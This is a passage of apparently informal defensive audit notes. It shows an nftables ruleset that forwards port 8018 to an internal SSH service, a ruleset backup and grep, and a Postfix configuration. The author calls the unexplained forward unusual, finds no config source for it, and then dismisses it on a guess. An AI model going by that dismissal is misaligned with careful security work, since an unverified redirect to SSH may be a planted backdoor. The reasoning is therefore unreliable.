chain POSTROUTING {
type nat hook postrouting priority srcnat; policy accept;
counter packets 1120 bytes 83208 jump CNI-HOSTPORT-MASQ
ip saddr 10.88.0.2 counter packets 0 bytes 0 jump CNI-5f87a854e5a6d82df88e3543
}
chain CNI-HOSTPORT-SETMARK {
counter packets 16 bytes 960 meta mark set mark or 0x2000
}
chain CNI-HOSTPORT-MASQ {
mark and 0x2000 == 0x2000 counter packets 16 bytes 960 masquerade
}
chain CNI-HOSTPORT-DNAT {
meta l4proto tcp tcp dport 8018 counter packets 16 bytes 960 jump CNI-DN-5f87a854e5a6d82df88e3
}
chain PREROUTING {
type nat hook prerouting priority dstnat; policy accept;
fib daddr type local counter packets 2671 bytes 127511 jump CNI-HOSTPORT-DNAT
}
chain OUTPUT {
type nat hook output priority -100; policy accept;
fib daddr type local counter packets 189 bytes 14877 jump CNI-HOSTPORT-DNAT
}
chain CNI-DN-5f87a854e5a6d82df88e3 {
meta l4proto tcp ip saddr 10.88.0.0/16 tcp dport 8018 counter packets 0 bytes 0 jump CNI-HOSTPORT-SETMARK
meta l4proto tcp ip saddr 127.0.0.1 tcp dport 8018 counter packets 16 bytes 960 jump CNI-HOSTPORT-SETMARK
meta l4proto tcp tcp dport 8018 counter packets 16 bytes 960 dnat to 10.88.0.2:22
}
}
table ip filter {
chain CNI-FORWARD {
counter packets 0 bytes 0 jump CNI-ADMIN
ip daddr 10.88.0.2 ct state related,established counter packets 0 bytes 0 accept
ip saddr 10.88.0.2 counter packets 0 bytes 0 accept
}
chain CNI-ADMIN {
}
chain FORWARD {
type filter hook forward priority filter; policy accept;
counter packets 0 bytes 0 jump CNI-FORWARD
}
}
```
DNAT for Port `8018: The CNI-HOSTPORT-DNAT` chain redirects TCP traffic destined for port 8018 to 10.88.0.2:22.
This is unusual because it's translating incoming traffic on port 8018 to SSH port 22 on an internal IP address.
Firstly lets backup the ruleset.
```bash
sudo nft list ruleset > ~/nftables-backup-$(date +%F).nft
```
But the in the config file, the definition is not present.
```bash
grep -R "meta l4proto tcp ip saddr 10.88.0.0/16 tcp dport 8018 counter packets" /etc
```
Returns empty match.
But iguess this is just for the container to communicate. Nothing to worry about iguess.
### SMTP
```bash
# See /usr/share/postfix/main.cf.dist for a commented, more complete version
# Debian specific: Specifying a file name will cause the first
# line of that file to be used as the name. The Debian default
# is /etc/mailname.
#myorigin = /etc/mailname
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
biff = no
# appending .domain is the MUA's job.
append_dot_mydomain = no
# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h
readme_directory = no
# See http://www.postfix.org/COMPATIBILITY_README.html -- default to 3.6 on
# fresh installs.
compatibility_level = 3.6
# TLS parameters
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
smtpd_tls_security_level=may
smtp_tls_CApath=/etc/ssl/certs
smtp_tls_security_level=may
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
myhostname = ls-2024-9
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
mydestination = $myhostname, ls-2024-9, localhost.localdomain, , localhost
relayhost =
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
inet_protocols = all
```